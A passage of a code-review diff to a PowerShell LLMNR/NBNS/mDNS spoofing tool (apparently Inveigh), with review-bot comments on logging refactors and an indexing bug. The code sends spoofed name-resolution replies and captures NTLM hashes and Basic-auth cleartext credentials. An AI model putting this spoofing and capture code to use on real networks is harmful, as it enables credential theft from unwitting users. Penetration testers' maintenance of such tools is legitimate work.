- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
+ $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
}
if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
- $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null
}
}
@@ -1936,36 +2019,26 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
+ $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
}
if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
- $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null
}
}
@@ -1974,7 +2047,7 @@ $HTTP_scriptblock =
if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP)
{
- $inveigh.IP_capture_list.Add($HTTP_source_IP)
+ $inveigh.IP_capture_list.Add($HTTP_source_IP) > $null
}
$HTTP_response_status_code = 0x32,0x30,0x30
@@ -2010,19 +2083,13 @@ $HTTP_scriptblock =
$HTTP_header_authorization = $HTTP_header_authorization -replace 'Basic ',''
$cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($HTTP_header_authorization))
$HTTP_client_close = $true
- $inveigh.cleartext_file_queue.Add($cleartext_credentials)
- $inveigh.cleartext_list.Add($cleartext_credentials)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP")
+ $inveigh.cleartext_file_queue.Add($cleartext_credentials) > $null
+ $inveigh.cleartext_list.Add($cleartext_credentials) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") > $null
if($inveigh.file_output)
{
- $inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) > $null
}
}
@@ -2189,7 +2256,9 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,$SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,
+ param ($DNSHostsIgnore,$DNSThreshold,$DNSTTL,$Evade,$IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,
+ $mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,
+ $SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,
$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval)
$sniffer_running = $true
@@ -2210,19 +2279,8 @@ $sniffer_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting sniffer/spoofer") > $null
$sniffer_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
- }
-
}
$sniffer_socket.Bind($end_point)
@@ -2364,6 +2422,7 @@ $sniffer_scriptblock =
if(([System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -or [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01') -and [System.BitConverter]::ToString($payload_bytes[10..11]) -ne '00-01')
{
$UDP_length[0] += 12
+ $NBNS_response_type = "[+]"
$NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] +
$NBNS_TTL_bytes +
@@ -2491,19 +2550,8 @@ $sniffer_scriptblock =
$NBNS_UDP_client.Connect($NBNS_learning_destination_endpoint)
$NBNS_UDP_client.Send($NBNS_request_packet,$NBNS_request_packet.Length)
$NBNS_UDP_client.Close()
- $NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
- }
-
+ $NBNS_learning_log.Add("$(Get-Date -format s) $NBNS_transaction_ID $NBNS_query_string") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] NBNS request $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) > $null
}
}
@@ -2522,7 +2570,19 @@ $sniffer_scriptblock =
$NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
$NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point)
$NBNS_send_socket.Close()
- $NBNS_response_message = "- response sent"
+ $NBNS_response_message = "[spoofed response sent]"
+
+ if($inveigh.requested_host_IP_list -NotContains "$source_IP $NBNS_query_string")
+ {
+ $inveigh.requested_host_IP_list.Add("$source_IP $NBNS_query_string") > $null
+ $inveigh.requested_host_list.Add($NBNS_query_string.ToLower()) > $null
+ }
+
+ if($inveigh.DNS)
+ {
+ DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
+ }
+
}
else
{
@@ -2537,73 +2597,17 @@ $sniffer_scriptblock =
{
$NBNS_request_ignore = $true
}
- elseif($NBNSTypes -notcontains $NBNS_query_type)
- {
- $NBNS_response_message = "- disabled NBNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $NBNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $NBNS_response_message = "- $source_IP is on ignore list"
- }
- elseif($NBNS_query_string.Trim() -eq '*')
- {
- $NBNS_response_message = "- NBSTAT request"
- }
- elseif($inveigh.valid_host_list -contains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is a valid host"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
- {
- $NBNS_response_message = "- previous capture from $source_IP"
- }
- elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
- {
- $NBNS_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
- }
- elseif($source_IP -eq $IP -and !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
- {
- $NBNS_response_message = "- local request"
- }
- elseif($destination_IP.IPAddressToString -eq $IP)
- {
- $NBNS_response_message = "- ResponderGuard detected and ignored"
- }
- else
- {
- $NBNS_response_message = "- something went wrong"
- }
-
+
+ $NBNS_response_message = SpooferResponseMessage -query_string $NBNS_query_string -mDNS_type ""
+ $NBNS_response_type = $NBNS_response_message[0]
+ $NBNS_response_message = $NBNS_response_message[1]
}
}
if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00')
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null
}
elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
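Review bot: The three-line unpack (`$NBNS_response_message = SpooferResponseMessage ...`, then `$NBNS_response_type = $NBNS_response_message[0]`, then `$NBNS_response_message = $NBNS_response_message[1]`) reuses the message variable as a temporary array, which is what invites the stale `[0]`/`[1]` indexing in the mDNS(QM) hunk; PowerShell multiple assignment does it in one line, `$NBNS_response_type,$NBNS_response_message = SpooferResponseMessage -query_string $NBNS_query_string -mDNS_type ""`. The same pattern is repeated in the mDNS(QU), mDNS(QM) and LLMNR hunks. The removed chain also had `disabled NBNS type`, `local request` and `ResponderGuard` branches keyed on `$NBNS_query_type`, the learning log and `$destination_IP`; the visible tail of SpooferResponseMessage only shows NBSTAT and mDNS-type cases, so if those NBNS-specific checks were not moved into it or into the `$NBNS_request_ignore` branch, such requests now fall through to `[something went wrong]` with a `[-]` tag. The enclosing $sniffer_scriptblock starts and ends outside the hunk.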
@@ -2613,19 +2617,8 @@ $sniffer_scriptblock =
if($inveigh.valid_host_list -notcontains $NBNS_query_string)
{
- $inveigh.valid_host_list.Add($NBNS_query_string)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
- }
-
+ $inveigh.valid_host_list.Add($NBNS_query_string) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP [$NBNS_query_string added to valid host list]") > $null
}
}
@@ -2643,6 +2636,7 @@ $sniffer_scriptblock =
$mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)]
$mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
+ $mDNS_response_type = "[+]"
$mDNS_response_data = $mDNS_query_payload_bytes +
0x00,0x01,0x00,0x01 +
@@ -2670,52 +2664,18 @@ $sniffer_scriptblock =
$destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
- $mDNS_response_message = "- response sent"
+ $mDNS_response_message = "[spoofed response sent]"
}
else
{
-
- if($mDNSTypes -notcontains 'QU')
- {
- $mDNS_response_message = "- disabled mDNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is on ignore list"
- }
- else
- {
- $mDNS_response_message = "- not spoofed due to previous capture"
- }
-
+ $mDNS_response_message = SpooferResponseMessage -query_string $mDNS_query_string -mDNS_type "QU"
+ $mDNS_response_type = $mDNS_response_message[0]
+ $mDNS_response_message = $mDNS_response_message[1]
}
}
- $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QU) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null
}
elseif([System.BitConverter]::ToString($payload_bytes) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*')
{
@@ -2723,6 +2683,7 @@ $sniffer_scriptblock =
$mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)]
$mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
+ $mDNS_response_type = "[+]"
$mDNS_response_data = $mDNS_query_payload_bytes +
0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 +
@@ -2752,52 +2713,18 @@ $sniffer_scriptblock =
$destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
- $mDNS_response_message = "- response sent"
+ $mDNS_response_message = "[spoofed response sent]"
}
else
{
-
- if($mDNSTypes -notcontains 'QM')
- {
- $mDNS_response_message = "- disabled mDNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is on ignore list"
- }
- else
- {
- $mDNS_response_message = "- not spoofed due to previous capture"
- }
-
+ $mDNS_response_message = SpooferResponseMessage -query_string $mDNS_query_string -mDNS_type "QM"
+ $mDNS_response_type = $mDNS_response_message[0]
+ $mDNS_response_message = $mDNS_response_message[1]
}
}
- $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$($mDNS_response_message[0]) [$(Get-Date -format s)] mDNS(QM) request $mDNS_query_string_full received from $source_IP $($mDNS_response_message[1])") > $null
}
}
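Review bot: The mDNS(QM) output line indexes `$mDNS_response_message[0]` and `[1]` after the variable has already been collapsed to a plain string (either `[spoofed response sent]` or the `[1]` element in the else branch), so the log entry begins with the first character of the message and ends with its second character instead of the type tag and text. The QU branch in the previous hunk has it right; change the line to `$inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QM) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null`. The enclosing $sniffer_scriptblock starts and ends outside the hunk.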
@@ -2809,6 +2736,7 @@ $sniffer_scriptblock =
{
$UDP_length[0] += $payload_bytes.Length - 2
$LLMNR_response_data = $payload_bytes[12..$payload_bytes.Length]
+ $LLMNR_response_type = "[+]"
$LLMNR_response_data += $LLMNR_response_data +
$LLMNR_TTL_bytes +
@@ -2883,19 +2811,8 @@ $sniffer_scriptblock =
$LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint)
$LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length)
$LLMNR_UDP_client.Close()
- $LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
- }
-
+ $LLMNR_learning_log.Add("$(Get-Date -format s) $LLMNR_transaction_ID $LLMNR_query_string") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] LLMNR request $LLMNR_query_string sent to 224.0.0.252") > $null
}
}
@@ -2914,7 +2831,19 @@ $sniffer_scriptblock =
$LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point)
$LLMNR_send_socket.Close()
- $LLMNR_response_message = "- response sent"
+ $LLMNR_response_message = "[spoofed response sent]"
+
+ if($inveigh.requested_host_IP_list -notcontains "$source_IP $LLMNR_query_string")
+ {
+ $inveigh.requested_host_IP_list.Add("$source_IP $LLMNR_query_string") > $null
+ $inveigh.requested_host_list.Add($LLMNR_query_string.ToLower()) > $null
+ }
+
+ if($inveigh.DNS)
+ {
+ DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
+ }
+
}
else
{
@@ -2924,62 +2853,16 @@ $sniffer_scriptblock =
}
else
{
-
- if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $LLMNR_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $LLMNR_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.valid_host_list -contains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is a valid host"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
- {
- $LLMNR_response_message = "- previous capture from $source_IP"
- }
- elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
- {
- $LLMNR_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
- }
- elseif($destination_IP.IPAddressToString -eq $IP)
- {
- $LLMNR_response_message = "- ResponderGuard detected and ignored"
- }
- else
- {
- $LLMNR_response_message = "- something went wrong"
- }
-
+ $LLMNR_response_message = SpooferResponseMessage -query_string $LLMNR_query_string -mDNS_type ""
+ $LLMNR_response_type = $LLMNR_response_message[0]
+ $LLMNR_response_message = $LLMNR_response_message[1]
}
}
if(!$LLMNR_request_ignore)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- }
-
+ $inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null
}
}
@@ -3016,19 +2899,8 @@ $sniffer_scriptblock =
if($inveigh.valid_host_list -notcontains $LLMNR_query_string)
{
- $inveigh.valid_host_list.Add($LLMNR_query_string)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
- }
-
+ $inveigh.valid_host_list.Add($LLMNR_query_string) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $LLMNR_query_string LLMNR response $LLMNR_response_IP received from $source_IP [$LLMNR_query_string added to valid host list]") > $null
}
}
@@ -3062,19 +2934,8 @@ $LLMNR_spoofer_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting LLMNR spoofer") > $null
$LLMNR_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
- }
-
}
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
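Review bot: The rewritten catch block still logs only a fixed string, so the reason the LLMNR listener failed (typically UDP 5355 already bound by another process, or the multicast join failing) is lost to the operator. Since the line is being touched anyway, carry the exception text: `$inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting LLMNR spoofer [$($_.Exception.Message)]") > $null`. The try block this catch belongs to begins outside the hunk.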
@@ -3112,6 +2973,7 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)])
$source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString
+ $LLMNR_response_type = "[+]"
if(!$Inspect -and ($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
@@ -3125,56 +2987,28 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
- $LLMNR_response_message = "- response sent"
- }
- else
- {
+ $LLMNR_response_message = "[spoofed response sent]"
- if($Inspect)
- {
- $LLMNR_response_message = "- inspect only"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ if($inveigh.requested_host_IP_list -notcontains "$source_IP $LLMNR_query_string")
{
- $LLMNR_response_message = "- $source_IP is not on reply list"
+ $inveigh.requested_host_IP_list.Add("$source_IP $LLMNR_query_string") > $null
+ $inveigh.requested_host_list.Add($LLMNR_query_string.ToLower()) > $null
}
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $LLMNR_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
- {
- $LLMNR_response_message = "- previous capture from $source_IP"
- }
- else
+
+ if($inveigh.DNS)
{
- $LLMNR_response_message = "- something went wrong"
+ DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
}
